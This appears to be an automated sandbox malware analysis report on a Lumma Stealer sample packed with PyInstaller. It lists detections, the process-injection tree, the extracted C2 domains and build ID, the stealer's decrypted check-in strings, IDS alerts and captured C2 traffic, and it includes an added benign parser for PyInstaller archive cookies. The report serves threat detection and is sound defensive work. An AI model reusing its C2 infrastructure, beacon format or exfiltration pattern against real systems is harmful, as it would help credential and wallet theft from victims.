Windows Analysis Report
ceFgl3jkkk.exe

Overview

General Information

Sample name: ceFgl3jkkk.exe (renamed because the original name is a hash value)
Original sample name: 857270428d9d88c5da6d8b9d33059d4e29347637879a17975631408c5359b623.exe
Analysis ID: 1560168
MD5: 9cf2fcabd10ee683a3652815014b368c
SHA1: f49914f1cf2b7fbba812eb8fd807b19065008b23
SHA256: 857270428d9d88c5da6d8b9d33059d4e29347637879a17975631408c5359b623
Tags: 77-105-161-194, exe, user-JAMESWT_MHT

Detection

LummaC
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Found pyInstaller with non standard icon
Injects a PE file into a foreign process
LummaC encrypted strings found
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Writes to foreign memory regions
Contains functionality to read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Process Tree

  • System is w10x64
  • ceFgl3jkkk.exe (PID: 824 cmdline: "C:\Users\user\Desktop\ceFgl3jkkk.exe" MD5: 9CF2FCABD10EE683A3652815014B368C)
    • ceFgl3jkkk.exe (PID: 7008 cmdline: "C:\Users\user\Desktop\ceFgl3jkkk.exe" MD5: 9CF2FCABD10EE683A3652815014B368C)
      • ngentask.exe (PID: 2976 cmdline: C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngentask.exe MD5: AE933850C93D3B3001AB21BB65C3EFA1)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

LummaC: {"C2 url": ["drawwyobstacw.sbs", "resinedyw.sbs", "mathcucom.sbs", "vennurviot.sbs", "allocatinow.sbs", "droppyrelivei.cfd", "condifendteu.sbs", "ehticsprocw.sbs", "enlargkiw.sbs"], "Build id": "DtiPjR--NashTraff"}
Source | Rule | Description | Author | Strings
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security | (none listed)
    No Sigma rule has matched
    Suricata IDS alerts (sorted by timestamp)
    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2024-11-21T13:45:22.256926+0100 | 2056570 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 57919 | 1.1.1.1 | 53 | UDP
    2024-11-21T13:45:22.503700+0100 | 2056568 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 64895 | 1.1.1.1 | 53 | UDP
    2024-11-21T13:45:22.773752+0100 | 2056566 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 61039 | 1.1.1.1 | 53 | UDP
    2024-11-21T13:45:23.031762+0100 | 2056564 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 59111 | 1.1.1.1 | 53 | UDP
    2024-11-21T13:45:23.292257+0100 | 2056562 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 53627 | 1.1.1.1 | 53 | UDP
    2024-11-21T13:45:23.539228+0100 | 2056560 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 60602 | 1.1.1.1 | 53 | UDP
    2024-11-21T13:45:23.786678+0100 | 2056558 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 49306 | 1.1.1.1 | 53 | UDP
    2024-11-21T13:45:24.034227+0100 | 2056556 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 61384 | 1.1.1.1 | 53 | UDP
    2024-11-21T13:45:26.060652+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49765 | 104.102.49.254 | 443 | TCP
    2024-11-21T13:45:26.878290+0100 | 2858666 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 49765 | 104.102.49.254 | 443 | TCP
    2024-11-21T13:45:27.114029+0100 | 2057415 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 63122 | 1.1.1.1 | 53 | UDP
    2024-11-21T13:45:28.616606+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49776 | 188.114.97.3 | 443 | TCP
    2024-11-21T13:45:28.616606+0100 | 2057416 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 49776 | 188.114.97.3 | 443 | TCP
    2024-11-21T13:45:29.330441+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.9 | 49776 | 188.114.97.3 | 443 | TCP
    2024-11-21T13:45:29.330441+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.9 | 49776 | 188.114.97.3 | 443 | TCP
    2024-11-21T13:45:29.977517+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.9 | 49780 | 188.114.97.3 | 443 | TCP
    2024-11-21T13:45:29.977517+0100 | 2057416 | 1 | Domain Observed Used for C2 Detected | 192.168.2.9 | 49780 | 188.114.97.3 | 443 | TCP

    AV Detection

    Source: ceFgl3jkkk.exe | Avira: detected
    Source: https://marshal-zhukov.com/api) | Avira URL Cloud: Label: malware
    Source: https://marshal-zhukov.com/apis | Avira URL Cloud: Label: malware
    Source: droppyrelivei.cfd | Avira URL Cloud: Label: malware
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: LummaC {"C2 url": ["drawwyobstacw.sbs", "resinedyw.sbs", "mathcucom.sbs", "vennurviot.sbs", "allocatinow.sbs", "droppyrelivei.cfd", "condifendteu.sbs", "ehticsprocw.sbs", "enlargkiw.sbs"], "Build id": "DtiPjR--NashTraff"}
    Source: ceFgl3jkkk.exe | ReversingLabs: Detection: 44%
    Source: Submitted sample | Integrated Neural Analysis Model: Matched 100.0% probability
    Source: ceFgl3jkkk.exe | Joe Sandbox ML: detected
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmp | String decryptor: drawwyobstacw.sbs
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmp | String decryptor: condifendteu.sbs
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmp | String decryptor: ehticsprocw.sbs
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmp | String decryptor: vennurviot.sbs
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmp | String decryptor: resinedyw.sbs
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmp | String decryptor: enlargkiw.sbs
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmp | String decryptor: allocatinow.sbs
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmp | String decryptor: mathcucom.sbs
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmp | String decryptor: droppyrelivei.cfd
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmp | String decryptor: Workgroup: -
    Source: 00000002.00000003.1532103299.0000000009C8B000.00000004.00000020.00020000.00000000.sdmp | String decryptor: DtiPjR--NashTraff
    Source: ceFgl3jkkk.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
    Source: unknown | HTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.9:49765 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.9:49776 version: TLS 1.2
    Source: ceFgl3jkkk.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
    Source: Binary string: D:\a\1\b\bin\win32\_multiprocessing.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1498027498.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _multiprocessing.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_uuid.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1498682200.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _uuid.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_decimal.pdb%% source: ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _decimal.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdbOO source: ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.0.dr
    Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: libssl-1_1.dll.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_ssl.pdb source: _ssl.pyd.0.dr
    Source: Binary string: D:\_w\1\b\libssl-1_1.pdbAA source: libssl-1_1.dll.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_lzma.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1497870502.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _lzma.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_queue.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1498233789.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _queue.pyd.0.dr
    Source: Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: VCRUNTIME140.dll.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_overlapped.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1498125097.00000000006CD000.00000004.00000020.00020000.00000000.sdmp
    Source: Binary string: D:\a\1\b\bin\win32\pyexpat.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1500128542.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, pyexpat.pyd.0.dr
    Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: libcrypto-1_1.dll.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_bz2.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1496897214.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _bz2.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\select.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1502556218.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_ctypes.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1497059480.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _ctypes.pyd.0.dr
    Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 1.1.1l 24 Aug 2021built on: Thu Aug 26 18:55:02 2021 UTCplatform: VC-WIN32OPENSSLDIR: "C:\Program Files (x86)\Common Files\SSL"ENGINESDIR: "C:\Program Files (x86)\OpenSSL\lib\engines-1_1"not available source: libcrypto-1_1.dll.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\python39.pdb source: python39.dll.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_asyncio.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1496140740.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _asyncio.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_decimal.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1497263952.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _decimal.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_hashlib.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1497503094.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _hashlib.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\unicodedata.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1502779320.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, unicodedata.pyd.0.dr
    Source: Binary string: D:\a\1\b\bin\win32\_socket.pdb source: ceFgl3jkkk.exe, 00000000.00000003.1498335139.00000000006CD000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.0.dr
    Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: libcrypto-1_1.dll.0.dr
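The dropped python39.dll, the *.pyd extension modules and the single D:\a\1\b\bin\win32\ PDB path they all share are consistent with a stock 32-bit CPython 3.9 runtime bundled by PyInstaller, which matches the "Found pyInstaller with non standard icon" signature: the first stage is a Python loader, and the C-language LummaC payload only appears in the injected ngentask.exe process. A quick static triage step is therefore to confirm the PyInstaller overlay and read its archive cookie, which records the Python version the bundle needs and, in PyInstaller 2.1 and later, the name of the Python DLL. The parser below is an added example, not part of the report or of PyInstaller; the cookie layout (8-byte magic, four big-endian 32-bit fields, then a 64-byte library name) is PyInstaller's CArchive trailer, and the byte strings it is run on are constructed stand-ins, not bytes from this sample.

```python
"""Locate a PyInstaller CArchive cookie in a PE overlay and decode it.
Added example. Cookie layout per PyInstaller's bootloader: 8-byte magic,
big-endian uint32 package length, TOC offset and TOC length, int32 Python
version, and (PyInstaller >= 2.1) a 64-byte NUL-padded Python library name."""
import struct

PYINST_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"
COOKIE_V21 = struct.Struct("!8sIIii64s")   # PyInstaller >= 2.1, 88 bytes
COOKIE_V20 = struct.Struct("!8sIIii")      # PyInstaller 2.0 and older, 24 bytes


def parse_pyinstaller_cookie(data):
    """Return a dict describing the embedded archive, or None if no cookie is found.

    The cookie normally ends the file, but an Authenticode signature or appended
    data can follow it, so search backwards for the magic instead of assuming
    a fixed offset."""
    pos = data.rfind(PYINST_MAGIC)
    if pos < 0:
        return None
    # Heuristic used by common extractors: exactly 24 bytes left means the old
    # short cookie; otherwise read the 88-byte cookie that carries the DLL name.
    if len(data) - pos == COOKIE_V20.size:
        _, pkg_len, toc_off, toc_len, pyver = COOKIE_V20.unpack_from(data, pos)
        pylib, cookie_size = None, COOKIE_V20.size
    else:
        if len(data) - pos < COOKIE_V21.size:
            return None   # truncated cookie, not a usable archive
        _, pkg_len, toc_off, toc_len, pyver, raw_lib = COOKIE_V21.unpack_from(data, pos)
        pylib = raw_lib.split(b"\x00", 1)[0].decode("ascii", "replace")
        cookie_size = COOKIE_V21.size
    # Version encoding: older builds store major*10+minor (39 for 3.9), newer
    # ones major*100+minor (309), which the bootloader tells apart the same way.
    major, minor = divmod(pyver, 100) if pyver >= 100 else divmod(pyver, 10)
    archive_start = pos + cookie_size - pkg_len       # package length includes the cookie
    return {
        "cookie_offset": pos,
        "archive_start": archive_start,
        "toc_offset": archive_start + toc_off,       # cookie stores the TOC offset archive-relative
        "toc_length": toc_len,
        "python_version": f"{major}.{minor}",
        "pylib_name": pylib,
    }


def looks_like_pyinstaller(data):
    return parse_pyinstaller_cookie(data) is not None


def build_fake_sample(pyver, old_cookie=False):
    """Constructed stand-in for a PyInstaller onefile PE: a stub header, a fake
    archive body, a fake TOC and a cookie. Not derived from the analysed file."""
    stub = b"MZ" + b"\x00" * 62                       # 64-byte placeholder for the PE image
    body = b"\xAA" * 32                                # fake compressed entries
    toc = b"T" * 16                                    # fake table of contents
    if old_cookie:
        pkg_len = len(body) + len(toc) + COOKIE_V20.size
        cookie = COOKIE_V20.pack(PYINST_MAGIC, pkg_len, len(body), len(toc), pyver)
    else:
        pkg_len = len(body) + len(toc) + COOKIE_V21.size
        cookie = COOKIE_V21.pack(PYINST_MAGIC, pkg_len, len(body), len(toc), pyver, b"python39.dll")
    return stub + body + toc + cookie


if __name__ == "__main__":
    for sample in (build_fake_sample(309), build_fake_sample(39),
                   build_fake_sample(39, old_cookie=True), b"MZ" + b"\x00" * 200):
        print(parse_pyinstaller_cookie(sample))
```

Run it on the real file with `parse_pyinstaller_cookie(open(path, "rb").read())`; a result naming python39.dll and Python 3.9 would be the expected outcome for this sample given the dropped runtime, after which a full extractor can pull the PYZ and the entry script for the actual loader logic.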
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Code function 0_2_00F603E2: FindFirstFileExW,GetLastError,FindNextFileW,GetLastError
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Code function 0_2_00F699B3: FindFirstFileExW
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Code function 2_2_00F699B3: FindFirstFileExW
    Source: C:\Users\user\Desktop\ceFgl3jkkk.exe | Code function 2_2_00F603E2: FindFirstFileExW,GetLastError,FindNextFileW,GetLastError
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe | Code functions containing inlined nop sequences (function ID, then the instruction following the 4x nop):
        3_2_004410DE: 4x nop then cmp dword ptr [edi+edx*8], 4E7D7006h
        3_2_0041032C: 4x nop then movzx esi, byte ptr [esp+eax+02h]
        3_2_0040D330: 4x nop then movzx esi, byte ptr [esp+eax-000000BEh]
        3_2_0044082D: 4x nop then cmp dword ptr [edi+edx*8], 27BAF212h
        3_2_0040F882: 4x nop then mov edi, ecx
        3_2_0042F04C: 4x nop then mov byte ptr [edi], cl
        3_2_0042F04C: 4x nop then mov byte ptr [edx], cl
        3_2_00401000: 4x nop then mov dword ptr [eax+ebx], 30303030h
        3_2_00401000: 4x nop then mov dword ptr [eax+ebx], 20202020h
        3_2_004240E0: 4x nop then mov word ptr [eax], cx
        3_2_004440F0: 4x nop then movzx edx, byte ptr [esp+eax+299316FDh]
        3_2_0042E080: 4x nop then add ebp, dword ptr [esp+0Ch]
        3_2_0040C150: 4x nop then mov word ptr [edi], dx
        3_2_0043E100: 4x nop then cmp dword ptr [edi+edx*8], 731CDBF3h
        3_2_0042D13C: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h
        3_2_0042D13C: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h
        3_2_004411C0: 4x nop then movzx edx, byte ptr [esp+ecx-15FF4FD1h]
        3_2_0040F1A0: 4x nop then movzx ebx, byte ptr [esp+ecx+08h]
        3_2_004292C0: 4x nop then movzx ebx, byte ptr [esp+edx+40h]
        3_2_004012D5: 4x nop then mov byte ptr [eax+ebx], 00000030h
        3_2_0042B2AA: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h
        3_2_00441322: 4x nop then mov dword ptr [0044FE84h], esi
        3_2_0042F339: 4x nop then mov edi, dword ptr [esi+04h]
        3_2_0042F339: 4x nop then mov byte ptr [edi], dl
        3_2_0042F339: 4x nop then mov byte ptr [edi], dl
        3_2_0042F339: 4x nop then mov byte ptr [edi], cl
        3_2_0042C442: 4x nop then movzx esi, byte ptr [esp+eax-352DC610h]
        3_2_0042C442: 4x nop then mov word ptr [eax], cx
        3_2_0041D44C: 4x nop then movzx ecx, byte ptr [esp+eax+72E893D5h]
        3_2_0043D4D0: 4x nop then cmp dword ptr [edx+ecx*8], C85F7986h
        3_2_004374E0: 4x nop then movzx ebx, byte ptr [edx]
        3_2_004124A9: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h
        3_2_0040A5D0: 4x nop then mov ebx, eax
        3_2_0040A5D0: 4x nop then mov ebp, eax
        3_2_0042F5E8: 4x nop then mov byte ptr [edi], dl
        3_2_0042F5E8: 4x nop then mov byte ptr [edi], dl
        3_2_0042F5E8: 4x nop then mov byte ptr [edi], cl
        3_2_0042D590: 4x nop then mov ebx, dword ptr [edi+04h]
        3_2_0042C5B6: 4x nop then mov ebx, dword ptr [esp]
        3_2_0043D6C0: 4x nop then cmp dword ptr [ebx+edi*8], 03BA5404h
        3_2_004226F0: 4x nop then movzx esi, byte ptr [esp+eax+608185C2h]
        3_2_004226F0: 4x nop then movzx edx, byte ptr [esp+ecx+04h]
        3_2_0041D68E: 4x nop then movzx edx, byte ptr [esp+ecx+72E892F9h]
        3_2_0041D68E: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h
        3_2_00430698: 4x nop then mov byte ptr [edx], al
        3_2_00430698: 4x nop then mov byte ptr [edx], al
        3_2_004106BE: 4x nop then movzx edx, byte ptr [esi+edi-41CF7017h]
        3_2_0042B76F: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h
        3_2_0041F860: 4x nop then movzx esi, byte ptr [esp+ecx-659232DCh]
        3_2_0041F860: 4x nop then mov byte ptr [esi], cl
        3_2_0041F860: 4x nop then cmp di, 005Ch
        3_2_0043D820: 4x nop then cmp dword ptr [ebx+edi*8], 07E776F1h
        3_2_0040D830: 4x nop then mov byte ptr [edi], al
        3_2_00408890: 4x nop then movzx edi, byte ptr [ecx+esi+25h]
        3_2_0042B8A0: 4x nop then cmp word ptr [ecx+eax+02h], 0000h
        3_2_0043E8B0: 4x nop then movzx ebx, byte ptr [eax+edx]
        3_2_00444930: 4x nop then movzx edi, byte ptr [esp+edx+299316FDh]
        3_2_0042FA6E: 4x nop then mov byte ptr [edi], al
        3_2_00425AF0: 4x nop then cmp word ptr [ebp+edi+02h], 0000h
        3_2_00441A90: 4x nop then cmp dword ptr [edx+ecx*8], 1CBB9425h
        3_2_00441A90: 4x nop then cmp dword ptr [ebx+edx*8], 07E776F1h
        3_2_0041EB05: 4x nop then jmp eax
        3_2_0043DB10: 4x nop then cmp dword ptr [ebx+esi*8], 62429966h
        3_2_0040EB29: 4x nop then mov word ptr [eax], cx
        3_2_0041DBCE: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h
        3_2_0042DBD0: 4x nop then cmp byte ptr [esi+ebx], 00000000h
        3_2_0042DBD0: 4x nop then add edi, 02h
        3_2_0042BCB0: 4x nop then cmp word ptr [ecx+eax+02h], 0000h
        3_2_00420C10: 4x nop then mov ecx, edx
        3_2_00430C1E: 4x nop then mov byte ptr [edx], al
        3_2_00430C1E: 4x nop then mov byte ptr [ebx], al
        3_2_0043EC20: 4x nop then movzx edx, byte ptr [esp+eax+72E892D9h]
        3_2_0043EC20: 4x nop then cmp dword ptr [ebp+ebx*8+00h], F3285E74h
        3_2_0043EC20: 4x nop then cmp dword ptr [ebx+edi*8], 731CDBF3h
        3_2_00429C80: 4x nop then cmp dword ptr [esi+edx*8], C85F7986h
        3_2_0042CC8A: 4x nop then jmp eax
        3_2_0042CC8A: 4x nop then cmp dword ptr [edi+esi*8], 07E776F1h
        3_2_00404CB0: 4x nop then movzx edx, byte ptr [esi+edi]
        3_2_0042BCB0: 4x nop then cmp word ptr [ecx+eax+02h], 0000h
        3_2_00405D50: 4x nop then movzx edx, byte ptr [esi+ebx]
        3_2_00425D50: 4x nop then mov esi, eax
        3_2_0043DD10: 4x nop then cmp dword ptr [esi+edx*8], 7B3AFDABh
        3_2_00421D90: 4x nop then movzx ecx, byte ptr [esp+eax+72E89391h]
        3_2_0040DE20: 4x nop then movzx ebx, byte ptr [esp+ebp+1C76AA82h]
        3_2_0041DED1: 4x nop then cmp dword ptr [esi+edx*8], F8FD61B8h
        3_2_0043BEE0: 4x nop then movzx eax, word ptr [esi+ecx]
        3_2_0042BF7F: 4x nop then movzx edi, byte ptr [esp+esi+10h]
        3_2_00443FC0: 4x nop then cmp word ptr [edi+ebx+02h], 0000h
        3_2_0043DFA0: 4x nop then cmp dword ptr [ebx+esi*8], 64567875h

    Networking

    Source: Network traffic | Suricata IDS: 2056564 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (resinedyw .sbs) : 192.168.2.9:59111 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056556 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawwyobstacw .sbs) : 192.168.2.9:61384 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056562 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vennurviot .sbs) : 192.168.2.9:53627 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056560 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ehticsprocw .sbs) : 192.168.2.9:60602 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.9:49776 -> 188.114.97.3:443
    Source: Network traffic | Suricata IDS: 2056570 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mathcucom .sbs) : 192.168.2.9:57919 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056568 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (allocatinow .sbs) : 192.168.2.9:64895 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2056566 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enlargkiw .sbs) : 192.168.2.9:61039 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2057415 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (marshal-zhukov .com) : 192.168.2.9:63122 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2057416 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (marshal-zhukov .com in TLS SNI) : 192.168.2.9:49780 -> 188.114.97.3:443
    Source: Network traffic | Suricata IDS: 2056558 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (condifendteu .sbs) : 192.168.2.9:49306 -> 1.1.1.1:53
    Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.9:49776 -> 188.114.97.3:443
    Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.9:49776 -> 188.114.97.3:443
    Source: Network traffic | Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.9:49765 -> 104.102.49.254:443
    Source: Malware configuration extractor | URLs: drawwyobstacw.sbs
    Source: Malware configuration extractor | URLs: resinedyw.sbs
    Source: Malware configuration extractor | URLs: mathcucom.sbs
    Source: Malware configuration extractor | URLs: vennurviot.sbs
    Source: Malware configuration extractor | URLs: allocatinow.sbs
    Source: Malware configuration extractor | URLs: droppyrelivei.cfd
    Source: Malware configuration extractor | URLs: condifendteu.sbs
    Source: Malware configuration extractor | URLs: ehticsprocw.sbs
    Source: Malware configuration extractor | URLs: enlargkiw.sbs
    Source: Joe Sandbox View | IP Address: 188.114.97.3
    Source: Joe Sandbox View | IP Address: 104.102.49.254
    Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49776 -> 188.114.97.3:443
    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49780 -> 188.114.97.3:443
    Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49765 -> 104.102.49.254:443
    Source: global traffic | HTTP traffic detected:
        GET /profiles/76561199724331900 HTTP/1.1
        Connection: Keep-Alive
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        Host: steamcommunity.com
    Source: global traffic | HTTP traffic detected:
        POST /api HTTP/1.1
        Connection: Keep-Alive
        Content-Type: application/x-www-form-urlencoded
